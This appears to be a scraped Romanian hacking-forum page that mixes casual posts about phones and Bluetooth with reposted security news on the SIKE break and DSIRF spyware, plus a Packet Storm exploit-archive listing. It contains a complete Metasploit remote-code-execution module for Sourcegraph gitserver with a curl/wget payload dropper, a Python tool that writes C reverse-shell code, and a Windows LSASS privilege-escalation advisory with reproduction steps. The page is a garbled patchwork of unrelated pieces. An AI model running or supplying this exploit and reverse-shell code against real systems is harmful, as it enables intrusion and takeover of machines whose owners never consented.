Kev

clean, de ce? https://www.virustotal.com/gui/url/d73aa4df76343576171630f7e897bf5cf19d7688ae83035a2387278e4cbfe939?nocache=1

Leave it to mathematicians to muck up what looked like an impressive new algorithm. In the US government's ongoing campaign to protect data in the age of quantum computers, a new and powerful attack that used a single traditional computer to completely break a fourth-round candidate highlights the risks involved in standardizing the next generation of encryption algorithms. Last month, the US Department of Commerce's National Institute of Standards and Technology, or NIST, selected four post-quantum computing encryption algorithms to replace algorithms like RSA, Diffie-Hellman, and elliptic curve Diffie-Hellman, which are unable to withstand attacks from a quantum computer. In the same move, NIST advanced four additional algorithms as potential replacements pending further testing in hopes one or more of them may also be suitable encryption alternatives in a post-quantum world. The new attack breaks SIKE, which is one of the latter four additional algorithms. The attack has no impact on the four PQC algorithms selected by NIST as approved standards, all of which rely on completely different mathematical techniques than SIKE. Getting totally SIKEd SIKE—short for Supersingular Isogeny Key Encapsulation—is now likely out of the running thanks to research that was published over the weekend by researchers from the Computer Security and Industrial Cryptography group at KU Leuven. The paper, titled An Efficient Key Recovery Attack on SIDH (Preliminary Version), described a technique that uses complex mathematics and a single traditional PC to recover the encryption keys protecting the SIKE-protected transactions. The entire process requires only about an hour’s time. The feat makes the researchers, Wouter Castryck and Thomas Decru eligible for a $50,000 reward from NIST. The advent of public key encryption in the 1970s was a major breakthrough because it allowed parties who had never met to securely trade encrypted material that couldn’t be broken by an adversary. Public key encryption relies on asymmetric keys, with one private key used to decrypt messages and a separate public key for encrypting. Users make their public key widely available. As long as their private key remains secret, the scheme remains secure. In practice, public key cryptography can often be unwieldy, so many systems rely on key encapsulation mechanisms, which allow parties who have never met before to jointly agree on a symmetric key over a public medium such as the Internet. In contrast to symmetric-key algorithms, key encapsulation mechanisms in use today are easily broken by quantum computers. SIKE, before the new attack, was thought to avoid such vulnerabilities by using a complex mathematical construction known as a supersingular isogeny graph. The cornerstone of SIKE is a protocol called SIDH, short for Supersingular Isogeny Diffie-Hellman. The research paper published over the weekend shows how SIDH is vulnerable to a theorem known as “glue-and-split” developed by mathematician Ernst Kani in 1997, as well as tools devised by fellow mathematicians Everett W. Howe, Franck Leprévost, and Bjorn Poonen in 2000. The new technique builds on what’s known as the “GPST adaptive attack,” described in a 2016 paper. The math behind the latest attack is guaranteed to be impenetrable to most non-mathematicians. Here’s about as close as you’re going to get: “The attack exploits the fact that SIDH has auxiliary points and that the degree of the secret isogeny is known,” Steven Galbraith, a University of Auckland mathematics professor and the “G” in the GPST adaptive attack, explained in a short writeup on the new attack. “The auxiliary points in SIDH have always been an annoyance and a potential weakness, and they have been exploited for fault attacks, the GPST adaptive attack, torsion point attacks, etc. He continued: Let E_0 be the base curve and let P_0, Q_0 \in E_0 have order 2^a. Let E, P, Q be given such that there exists an isogeny \phi of degree 3^b with \phi : E_0 \to E, \phi(P_0) = P, and \phi(Q_0) = Q. A key aspect of SIDH is that one does not compute \phi directly, but as a composition of isogenies of degree 3. In other words, there is a sequence of curves E_0 \to E_1 \to E_2 \to \cdots \to E connected by 3-isogenies. Essentially, like in GPST, the attack determines the intermediate curves E_i and hence eventually determines the private key. At step i the attack does a brute-force search of all possible E_i \to E_{i+1}, and the magic ingredient is a gadget that shows which one is correct. (The above is over-simplified, the isogenies E_i \to E_{i+1} in the attack are not of degree 3 but of degree a small power of 3.) More important than understanding the math, Jonathan Katz, an IEEE Member and professor in the department of computer science at the University of Maryland, wrote in an email: “the attack is entirely classical, and does not require quantum computers at all.” Lessons learned SIKE is the second NIST-designated PQC candidate to be invalidated this year. In February, IBM post-doc researcher Ward Beullens published research that broke Rainbow, a cryptographic signature scheme with its security, according to Cryptomathic, “relying on the hardness of the problem of solving a large system of multivariate quadratic equations over a finite field.” NIST’s PQC replacement campaign has been running for five years. Here’s a brief history: 1st round (2017)—69 candidates 2nd round (2019)—26 surviving candidates 3rd round (2020)—7 finalists, 8 alternates 4th round (2022)—3 finalists and 1 alternate selected as standards. SIKE and three additional alternates advanced to a fourth round. Rainbow fell during Round 3. SIKE had made it until Round 4. Katz continued: I asked Jao, the SIKE co-inventor, why the weakness had come to light only now, in a relatively later stage of its development. His answer was insightful. He said: The version of SIKE submitted to NIST used a single step to generate the key. A possible variant of SIKE could be constructed to take two steps. Jao said that it’s possible that this latter variant might not be susceptible to the math causing this breakage. For now, though, SIKE is dead, at least in the current running. The schedule for the remaining three candidates is currently unknown. Source: arstechnica.com

This archive contains all of the 68 exploits added to Packet Storm in July, 2022. Content: Directory of 202207-exploits\2207-exploits 08/02/2022 11:41 PM <DIR> . 08/02/2022 11:41 PM <DIR> .. 07/19/2022 05:55 PM 1,489 asusgamesdk1004-unquotedpath.txt 07/05/2022 05:14 PM 1,790 atm56-sql.txt 07/01/2022 06:13 PM 1,678 bigbluebutton23-xss.txt 07/01/2022 05:50 PM 479 classifiedlisting229-xss.txt 07/21/2022 11:33 PM 8,293 codoforum51-exec.txt 07/29/2022 05:23 PM 756 crs10-xss.txt 07/25/2022 07:02 PM 549 CVE-2022-35911.sh.txt 07/21/2022 10:53 PM 468,395 DASDEC-XSS.pdf 07/29/2022 05:11 PM 3,826 dingtian31276A-bypass.txt 07/04/2022 05:23 PM 1,787 douphp12-sql.txt 07/21/2022 11:20 PM 1,615 drfone408-unquotedpath.txt 07/20/2022 07:40 PM 13,866 emporiumecommcms12-sql.txt 07/06/2022 06:25 PM 7,001 eqsintegrityline-xss.txt 07/26/2022 06:07 PM 8,840 expertxjprb10-sql.txt 07/29/2022 05:28 PM 1,757 geonetwork420-xml.txt 07/26/2022 06:09 PM 2,984 gms10-shell.txt 07/05/2022 05:11 PM 3,872 GS20220705135846.tgz 07/06/2022 06:33 PM 10,071 GS20220706153018.txt 07/06/2022 06:37 PM 6,127 GS20220706153551.tgz 07/07/2022 04:14 PM 6,804 GS20220707131306.tgz 07/11/2022 05:08 PM 1,195 GS20220711140800.txt 07/11/2022 05:12 PM 6,253 GS20220711141006.tgz 07/11/2022 05:15 PM 8,003 GS20220711141406.tgz 07/15/2022 05:57 PM 8,840 GS20220715145633.tgz 07/15/2022 05:59 PM 3,306 GS20220715145905.tgz 07/21/2022 11:39 PM 9,212 GS20220721203759.tgz 07/26/2022 06:12 PM 4,292 his10-sql.txt 07/21/2022 11:18 PM 5,973 iotransfer40-exec.txt 07/01/2022 06:15 PM 2,993 jahx221-exec.txt 07/12/2022 11:03 PM 3,801 jboss_remoting_unified_invoker_rce.rb.txt 07/21/2022 11:28 PM 757 kite120216100-unquotedpath.txt 07/28/2022 05:50 PM 4,830 loanmgmtsys10-sql.txt 07/29/2022 05:02 PM 649 loanms10-xss.txt 07/06/2022 06:20 PM 2,030 magnoliacms6219-xss.txt 07/25/2022 06:57 PM 12,766 mmves12-sql.txt 07/04/2022 05:24 PM 7,402 MVID-2022-0620.txt 07/05/2022 05:20 PM 3,213 MVID-2022-0621.txt 07/18/2022 07:38 PM 1,955 MVID-2022-0622.txt 07/18/2022 07:40 PM 2,161 MVID-2022-0623.txt 07/18/2022 07:42 PM 3,655 MVID-2022-0624.txt 07/22/2022 07:26 PM 2,698 MVID-2022-0625.txt 07/11/2022 05:19 PM 5,262 nginx1200-dos.txt 07/21/2022 11:29 PM 9,002 octobotwi043-exec.txt 07/18/2022 07:37 PM 1,460 orangestation10-sql.txt 07/04/2022 05:22 PM 708 paymoney33-xss.txt 07/26/2022 06:04 PM 1,984 pcprotectep517470-escalate.txt 07/18/2022 07:36 PM 13,878 pls31-sql.txt 07/14/2022 05:18 PM 176,787 prestashop1767-xssupload.pdf 07/26/2022 06:17 PM 3,946 roxy_wi_exec.rb.txt 07/29/2022 05:17 PM 1,034 rpcpy060-exec.txt 07/11/2022 05:20 PM 5,218 Sashimi-Evil-OctoBot-Tentacle-master.zip 07/19/2022 06:02 PM 13,369 SCHUTZWERK-SA-2022-003.txt 07/04/2022 05:20 PM 1,313 sms2020-sql.txt 07/13/2022 08:29 PM 6,129 sourcegraph_gitserver_sshcmd.rb.txt 07/18/2022 07:30 PM 11,346 tts10-sql.txt 07/01/2022 05:49 PM 2,019 typeorm-sql.txt 07/29/2022 05:14 PM 2,426 wptransposh107-auth.txt 07/29/2022 05:05 PM 2,540 wptransposh107-xss.txt 07/29/2022 05:07 PM 3,192 wptransposh107persistent-xss.txt 07/29/2022 05:31 PM 2,487 wptransposh1081-auth.txt 07/29/2022 05:26 PM 2,365 wptransposh1081-disclose.txt 07/29/2022 05:40 PM 2,496 wptransposh1081-exec.txt 07/29/2022 05:38 PM 2,953 wptransposh1081-sql.txt 07/29/2022 05:21 PM 2,954 wptransposh1081-xsrf.txt 07/29/2022 04:59 PM 823 wpuseronline2876-xss.txt 07/11/2022 05:23 PM 1,532 wpvsbb329-sql.txt 07/01/2022 06:17 PM 4,029 ZSL-2022-5709.txt 07/21/2022 11:34 PM 6,572 ZSL-2022-5710.txt 69 File(s) 935,787 bytes 2 Dir(s) 41,100,783,616 bytes free Download: 202207-exploits.tgz (553.9 KB) Source

In main page, m-am exprimat gresit Da, poker, etc... I-am pus conset, iar userul trebuie sa completeze data de nastere

Joining a Wi‑Fi network By specifying the SSID, encryption type, password/passphrase, and if the SSID is hidden or not, mobile device users can quickly scan and join networks without having to manually enter the data.[49] A MECARD-like format is supported by Android and iOS 11+.[50] Try free now Source: wikipedia

Salut, Afecteaza cumva indexarea paginilor in motoarele de cautare in caz ca instalez un plugin Agree and Disagree cu anul nasterii in index? sau trebuie ceva modificari in robots.txt? Agrew ii redirectioneaza in index2, Disagree back to Google, nu se afiseaza continutul site-ului daca nu completeaza data nasterii, e.g. yourfreedom.ro Multumesc anticipat

Windows and Adobe Reader exploits said to target orgs in Europe and Central America. Microsoft said on Wednesday that an Austria-based company named DSIRF used multiple Windows and Adobe Reader zero-days to hack organizations located in Europe and Central America. Multiple news outlets have published articles like this one, which cited marketing materials and other evidence linking DSIRF to Subzero, a malicious toolset for “automated exfiltration of sensitive/private data” and “tailored access operations [including] identification, tracking and infiltration of threats.” Members of the Microsoft Threat Intelligence Center, or MSTIC, said they have found Subzero malware infections spread through a variety of methods, including the exploitation of what at the time were Windows and Adobe Reader zero-days, meaning the attackers knew of the vulnerabilities before Microsoft and Adobe did. Targets of the attacks observed to date include law firms, banks, and strategic consultancies in countries such as Austria, the UK, and Panama, although those aren’t necessarily the countries in which the DSIRF customers who paid for the attack resided. An email sent to DSIRF seeking comment wasn’t returned. Wednesday’s post is the latest to take aim at the scourge of mercenary spyware sold by private companies. Israel-based NSO Group is the best-known example of a for-profit company selling pricey exploits that often compromise the devices belonging to journalists, attorneys, and activists. Another Israel-based mercenary named Candiru was profiled by Microsoft and University of Toronto’s Citizen Lab last year and was recently caught orchestrating phishing campaigns on behalf of customers that could bypass two-factor authentication. Also on Wednesday, the US House of Representatives Permanent Select Committee on Intelligence held a hearing on the proliferation of foreign commercial spyware. One of the speakers was the daughter of a former hotel manager in Rwanda who was imprisoned after saving hundreds of lives and speaking out about the genocide that had taken place. She recounted the experience of having her phone hacked with NSO spyware the same day she met with the Belgian foreign affairs minister. Referring to DSIRF using the work KNOTWEED, Microsoft researchers wrote: Wednesday’s post also provides detailed indicators of compromise that readers can use to determine if they have been targeted by DSIRF. Microsoft used the term PSOA—short for private-sector offensive actor—to describe cyber mercenaries like DSIRF. The company said most PSOAs operate under one or both of two models. The first, access-as-a-service, sells full end-to-end hacking tools to customers for use in their own operations. In the other model, hack-for-hire, the PSOA carries out the targeted operations itself. Source: arstechnica.com

Accessible and engaging coding for all Enable every student to express themselves through code Paint Inspired by the Logo Turtle, Paint allows students to create animated designs with code Chatbot Make chatbots that crack jokes, answer questions, play games, or tell stories URL: https://www.pickcode.io Try the preview Source: Google

Meet Writesonic: World's only AI writer that helps you write SEO-optimized, long-form (up to 1500 words) blog posts & articles in 15 seconds. Primit de la un amic. URL: https://writesonic.com/

Salut. Detin un Stick WiFi, bun... blalalala vreau sa inchid unitatea din telefon prin WiFi, (Android) Thanks Edit:/ prin hotspot LE:// TeamViewer

Man, din moment ce i-mi indica N+S+E+V pe GPS si viteza cu care ma deplasez + pulsul inimii etc... ar trebui sa existe

Omule, vreau sa stau intr-un loc, iar cand trece cineva pe langa mine cu 170n Km/h sa-mi afiseze viteza, ce mi-ai trimis tu cu imgtflyflklg nu functioneaza, este pentru viteza timpului cu care circuli TU, nu altcineva. Edit:/ sa ma exprim pe intelesul tau: Deci: trece prostul cu permis cumparat de nu stiu de unde cu 200km/h iar eu stationez, capis?

S-a sters, e suc pe tastatura On: cu riscul de a ma repeta, se modifica mesageria vocala intr-o distanta de 500m/1Km

Salut, Apelez pe cineva in reteaua Orange RO, iar cand intervine mesageria vocala, i-mi raspunde cu: in cazul in care persoana respectiva se afla la domiciliu, in cazul in care persoana respectiva se deplaseaza 500m/1Km: aceeasi voce de robot, sa fie din releu? Multumesc

The efficient digital whiteboard. qboard is a wholly client-side whiteboard app with efficient keyboard shortcuts, to make drawing feel as seamless as possible. In the spirit of Vim, it's possible to do everything that isn't drawing without moving your hands. It's hosted on my website. Here's a demo video: Features Here are the default keybindings: Tab cycles through three toolbar visibilities: the full toolbar, a status pane, and completely hidden. Shift snaps lines to multiples of 45°, and makes squares and circles. X is Cut when there's something selected, and Eraser when nothing is selected. The Eraser is element level: it removes entire paths. You can use X to delete whatever you have selected. E or R, when already that color, resets it to black. There are also keybindings with Shift and Ctrl, which you can view in-app. Other neat things you can do: Hit the export button to save to a PDF. The save button exports to a JSON file, which you can later load back in to qboard. Use your browser's paste function (usually Ctrl+V or Cmd+V on Mac) to paste images from the system clipboard. You can also drag images onto the board, or use the file picker on the left side of the screen (labeled Open). Open your saved JSON files with the file picker to replace your current board with one from a file. Alternatively, drag and drop your saved JSON files; instead of overwriting your current board, this will insert the contents of the files into the board after the current page! Right-click to bring up a context menu to change the style. If you have a saved JSON file accessible via a URL, you can make a link that preloads the board with that file, like this one: https://cjquines.com/qboard/?json=example.json. Design principles qboard is made for seamless lecturing. It's designed to be easy to use and nice to look at while sharing your screen. It should also be easy to share what you've written afterward as a PDF. This guides some of its principles: It should be possible to do everything that isn't drawing just with keys. Ideally, only with the keys on one half of the keyboard, to make presentations flow smoothly. You shouldn't need to move your mouse all the way to the left to change tools, or to move your hand to the right to switch to the pen tool. It has pages, rather than extending in different directions. It should feel like writing on multiple blackboards, and not an infinite sheet of paper. - We are considering changing this to allow an infinite scroll mode (see #6). Pages are fixed at a 16:9 ratio, so when that, in full-screen mode, most screens are perfectly filled by qboard. Additionally, when pages are later exported to a PDF, they have the same dimensions as a slideshow. There are some sense to the default keybindings: The three keys I use the most are on F, D, and S. A is assigned to make sense with S, and Shift + F to make sense with F. I tend to switch between colors and back while presenting, hence the E and R bindings. Imitating vim, X is like delete, which both cuts and erases. Ellipse and Rectangle start with E and R, while V is Move in Photoshop too. Q, A, and Z control stroke style, and W, S, and X control fill style. They form a column, going from "least" to "most". The Ctrl keybindings are pretty universal, except maybe D, for Duplicate. Although initially designed for giving lectures, the whiteboard controls are pretty good. Frequently asked questions There was a short period of time when we used a different file format for our JSON files. It's very unlikely that you have such a file. In case you do, you can make it compatible with the modern qboard app by taking the file and wrapping the contents like so: { "qboard-version": 1, "pages": OLD_FILE_CONTENTS_GO_HERE } If we have released a new file version beyond version 1, just opening any old files and saving them again will update them to the latest version. Implementation details It's build on the nwb toolkit, which handles React, Webpack, and Babel. We're using Typescript. The main app is mostly powered through Fabric.js, with KeyboardJS handling keybindings, and pdfmake handling exporting to PDF. We extend the Fabric canvas to a Page class with some convenience functions. The Pages class stores pages in a JSON array; whenever we switch pages, we remove all the objects in the canvas and reload from memory. In other words, we only store the live objects for the current page; all other pages are stored serialized. Boards are serialized to JSON just by collecting the serialized array, and adding a small amount of metadata to ensure compatibility. A saved qboard file is thus entirely human-readable, though since it also stores paths, it may be unwieldy. We also work with two canvas elements. The top canvas is a temporary one that renders lines, ellipses, and rectangles as they're being drawn, and after they're drawn, they're removed and added to the base canvas. The base canvas handles everything else: the move tool, free drawing, the eraser, and so on; the top canvas is hidden for these operations. This is for performance reasons, so the base canvas doesn't have to rerender every time the mouse moves on the top canvas. The main source is qboard.ts, which handles listening to mouse events and switching tools. Everything else is delegated to handlers, which are in individual files: action.ts, which abstracts the actions for the front-end. clipboard.ts, which handles cutting, copying, and pasting. history.ts, which undoes and redoes with a pure(-ish) history stack. keyboard.ts, which catches keyboard events that aren't H. styles.ts, which gives an interface for changing pen style. tools.ts, which implements each non-free-drawing tool. Development Running npm start will start a development server, which watches source files for changes. Run npm run build to generate the static application files, suitable for hosting or offline use. We have linters; run the full suite with npm run lint, and automatically fix most warnings/errors with npm run lint:fix. If you maintain a top-level deploy.js file, you can build the files and deploy in one step by running npm run deploy. We also have a Dockerfile which runs the development server in a container; build the image with docker build -t qboard ., then run with docker run -d --name qboard qboard. Note that this server is not suitable for production use; just host the static files instead. The FabricJS file is huge and it doesn't support tree shaking, so the qboard demo at cjquines.com uses a custom build. It includes gestures, animation, free drawing, interaction, serialization, fabric.Rect, fabric.Ellipse, fabric.Image, fabric.Line, and window.fabric, which I think is the absolute minimum needed for it to work. (Do note that custom build currently has issues, though. If you encounter errors, you may wish to try this demo, which uses the full build.) Download: qboard-master.zip or git clone https://github.com/cjquines/qboard.git Source

Salut, Exista vreo aplicate pentru detectarea vitezei al unui autovehicul, pentru Android? Ce am gasit in Store suntm doar anti-radar {anti-police} Multumesc anticipat

A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the commands that are able to be executed through the git exec REST API. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Sourcegraph gitserver sshCommand RCE', 'Description' => %q{ A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the commands that are able to be executed through the git exec REST API. }, 'Author' => [ 'Altelus1', # github PoC 'Spencer McIntyre' # metasploit module ], 'References' => [ ['CVE', '2022-23642'], ['URL', 'https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9'], ['URL', 'https://github.com/Altelus1/CVE-2022-23642'], ], 'DisclosureDate' => '2022-02-18', # Public disclosure 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory }, ], [ 'Linux Dropper', { 'Platform' => 'linux', # when the OS command is executed, it's executed twice which will cause some of the command stagers to # be corrupt, these two work even for larger payloads because they're downloaded in a single command 'CmdStagerFlavor' => %w[curl wget], 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper }, ] ], 'DefaultOptions' => { 'RPORT' => 3178 }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']), OptString.new('EXISTING_REPO', [false, 'An existing, cloned repository']) ]) end def check res = send_request_exec(Rex::Text.rand_text_alphanumeric(4..11), ['config', '--default', '', 'core.sshCommand']) return CheckCode::Unknown unless res if res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/ # this is the response if the target repo does exist, highly unlikely since it's randomized return CheckCode::Vulnerable('Successfully set core.sshCommand.') elsif res.code == 404 && res.body =~ /"cloneInProgress"/ # this is the response if the target repo does not exist return CheckCode::Vulnerable elsif res.code == 400 && res.body =~ /^invalid command/ # this is the response when the server is patched, regardless of if there are cloned repos return CheckCode::Safe end CheckCode::Unknown end def exploit if datastore['EXISTING_REPO'].blank? @git_repo = send_request_list.sample fail_with(Failure::NotFound, 'Did not identify any cloned repositories on the remote server.') unless @git_repo print_status("Using automatically identified repository: #{@git_repo}") else @git_repo = datastore['EXISTING_REPO'] end print_status("Executing #{target.name} target") @git_origin = Rex::Text.rand_text_alphanumeric(4..11) git_remote = "git@#{Rex::Text.rand_text_alphanumeric(4..11)}:#{Rex::Text.rand_text_alphanumeric(4..11)}.git" vprint_status("Using #{@git_origin} as a fake git origin") send_request_exec(@git_repo, ['remote', 'add', @git_origin, git_remote]) case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end def cleanup return unless @git_repo && @git_origin vprint_status('Cleaning up the git changes...') # delete the remote that was created send_request_exec(@git_repo, ['remote', 'remove', @git_origin]) # unset the core.sshCommand value send_request_exec(@git_repo, ['config', '--unset', 'core.sshCommand']) ensure super end def send_request_exec(repo, args, timeout = 20) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'exec'), 'method' => 'POST', 'data' => { 'Repo' => repo, 'Args' => args }.to_json }, timeout) end def send_request_list res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'list'), 'method' => 'GET', 'vars_get' => { 'cloned' => 'true' } }) fail_with(Failure::Unreachable, 'No server response.') unless res fail_with(Failure::UnexpectedReply, 'The gitserver list API call failed.') unless res.code == 200 && res.get_json_document.is_a?(Array) res.get_json_document end def execute_command(cmd, _opts = {}) vprint_status("Executing command: #{cmd}") res = send_request_exec(@git_repo, ['config', 'core.sshCommand', cmd]) fail_with(Failure::Unreachable, 'No server response.') unless res unless res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/ if res.code == 404 && res.get_json_document.is_a?(Hash) && res.get_json_document['cloneInProgress'] == false fail_with(Failure::BadConfig, 'The specified repository has not been cloned.') end fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.') end send_request_exec(@git_repo, ['push', @git_origin, 'master'], 5) end end # 0day.today [2022-07-17] # Source

Powered by advanced AI machine learning inpainting technology Tips: Try to hug the box to the ENTIRE object (AVOID partial selection) regardless if it were partially blocked. "Undo" can handle box selections, brush strokes and removal results. URL: https://cleanupphotos.com Source

This is a C language reverse shell generator that is written in Python. import time import sys import pyautogui import subprocess # Loading() def processing(): animation = ["[■□□□□□□□□□]","[■■□□□□□□□□]", "[■■■□□□□□□□]", "[■■■■□□□□□□]", "[■■■■■□□□□□]", "[■■■■■■□□□□]", "[■■■■■■■□□□]", "[■■■■■■■■□□]", "[■■■■■■■■■□]", "[■■■■■■■■■■]"] for i in range(len(animation)): time.sleep(0.3) sys.stdout.write("\r" + animation[ i % len(animation)]) sys.stdout.flush() print("\n") # C language reverse shell generator code: def C_rev(): print("Welcome to R-Security C reverse shell generator") print("1 - C language rev shell") user = int(input("Please enter a number for rev shell: ")) if user == 1: ip = input("Enter target IP: ") port = input("Enter target port: ") time.sleep(1) processing() with open("crevshell.c", "w") as payload: payload.write(""" #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <stdlib.h> #include <unistd.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void){ int port = ENTER_TARGET_PORT_HERE; struct sockaddr_in revsockaddr; int sockt = socket(AF_INET, SOCK_STREAM, 0); revsockaddr.sin_family = AF_INET; revsockaddr.sin_port = htons(port); revsockaddr.sin_addr.s_addr = inet_addr("[ENTER_TARGET_IP_HERE"); connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)); dup2(sockt, 0); dup2(sockt, 1); dup2(sockt, 2); char * const argv[] = {"pwsh", NULL}; execve("{shell}", argv, NULL); return 0; } """) print("[*] Reverse shell created successfully!") print("[!] Do change the target IP and target PORT fields.") print('\033[1m' + "Thank you for using R-Security C reverse shell generator tool" + '\033[0m') C_rev() Source

2FA 3D Secure https://go.rapyd.net/card-acceptance-europe?utm_source=adwords&utm_medium=ppc&utm_term=credit card processing&utm_campaign=2020-07+Card+Acceptance+Europe&hsa_net=adwords&hsa_grp=131304370526&hsa_ad=576528181169&hsa_tgt=kwd-10007631&hsa_kw=credit card processing&hsa_ver=3&hsa_acc=3503966619&hsa_cam=13699788616&hsa_src=g&hsa_mt=b&gclid=EAIaIQobChMIobKGvor2-AIVkN1RCh3pbgMzEAAYASAAEgLYpPD_BwE

On Windows, the buffer for redirected logon context does not protect against spoofing resulting in arbitrary code execution in the LSA leading to local elevation of privilege. advisory-info.txt Windows: Kerberos Redirected Logon Buffer EoP Platform: Windows Server 2022 Class: Elevation of Privilege Security Boundary: User Summary: The buffer for redirected logon context doesn't protect against spoofing resulting in arbitrary code execution in the LSA leading to local EoP. Note: This is distinct from the previous issue I reported (case 70653). That was manipulating the redirected logon credentials buffer, this instead manipulated the buffer used to track the context between CredSSP and the final authentication. The previous issue might be exploitable remotely whereas this is local only as you need to be able to encrypt the buffers. Description: When a remote credential guard connection is made via CredSSP the TSSSP needs to store the credentials for later use by the logon process. This is done by encrypting the credentials using the CredProtect API into a string which can later be passed as the password to LsaLogonUser to complete the logon. The encrypted credentials contain the pointer to the TSSSP context and function pointers to callback functions to get the redirected credentials. The structure also contains a GUID, but that's static across versions of Windows. If I had to guess, the developers assumed that because CredProtect encrypts using a per-logon-session key that a normal user couldn't encrypt their own buffer which would be accepted by the Kerberos package, as both TSSSP and Kerberos run in the SYSTEM logon session. Unfortunately that's not true, CredProtectEx API (and the underlying RtlEncryptMemory) API added a flag to encrypt the buffer for use by the SYSTEM logon session, the user can't decrypt the buffer but that doesn't matter. You do need to do a few tweaks to the buffer to get it accepted but that requires no privileges. At a basic level this can be used to call an arbitrary function in LSASS by encrypting your own buffer and passing it to LsaLogonUser (or it's higher level equivalents) as the password. This doesn't require that Terminal Services is enabled on the machine, but it does need Remote Guard enabled otherwise the Kerberos package will ignore the buffer. LSASS does have CFG/XFG enabled but you could call something like LoadLibrary or WinExec as you control the first parameter's pointer value. Getting memory addresses might not be that difficult as it seems LSASS leaks pointers all over the place, for example the TsPkgContext field in the MS-RDPEAR isolated credential request is just a heap address of the TS_CONTEXT pointer which contains the logon buffer, you could therefore probably use CredSSP itself to setup a suitable buffer and leak its address for any in-process data you need. Fixing wise, the design of this is terrible and shouldn't have passed a basic security design review, but it is what it is. At least you probably should use a unique random value for the magic GUID so that it can't be trivially spoofed. However be careful, the encryption scheme just seems to be CBC with no per-encryption salt or cryptographic authentication which means that if you leave the GUID at the front it might be possible to copy the encrypted GUID from a real buffer (using CredSSP to generate it) then the rest can be corrupted in such a way to allow for exploitation. Proof of Concept: I've provided a PoC as a C++. This will just try and get LoadLibrary called with an arbitrary pointer. It's expected to crash LSASS, however, calling LoadLibrary is just to demonstrate it's possible. I've not put much effort into developing an end to end exploit as it isn't necessary. 1) Compile the C++ project. 2) Enable remote credential guard on the system using the registry from an admin prompt: reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD 3) Run the POC as a non-admin user. Expected Result: The logon should fail. Observed Result: The LSASS process crashes trying to dereference an invalid pointer. This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-06-06. Related CVE Numbers: CVE-2022-24545,CVE-2022-30165. Found by: forshaw@google.com Download: GS20220706153551.tgz (6 KB) Source

IT , sa nu faca prostii utilizatorii Sper sa pot pleca pe la sfarsitul lunii urmatoare (iulie - august) Edit:/ gen spam, scam, s.a.m.d.

Salut, detin 5 blog-uri, urmeaza sa ma internez intr-un spital din Europa, unde am acces la TV doar pe YouTube, dureaza sa iau acces la tot (Google, Yandex, RST, etc..) Este cineva de incredere? imi poate lãsa mesaj privat. Multumesc anticipat.

Am testat eu, functioneaza Tethering Bluetooth sony + alt device (nu-mi permite Android-ul Cablu nu gasesc in sat Thanks man, insa nu gasesc, am gasit doar RCA, online ma abtin

Bun, deci am doua boxe portabile cu auxiliar (in-put) si bluetooth am cautat si am gasit cablu jack <||------||> pot conecta ambele boxe intre ele, iar ulterior sa ma conectez la ele prin bluetooth? Nu gasesc cablu jack Y Nu-mi permite adroid-ul, stiu ca se poate, testat prin bluetooth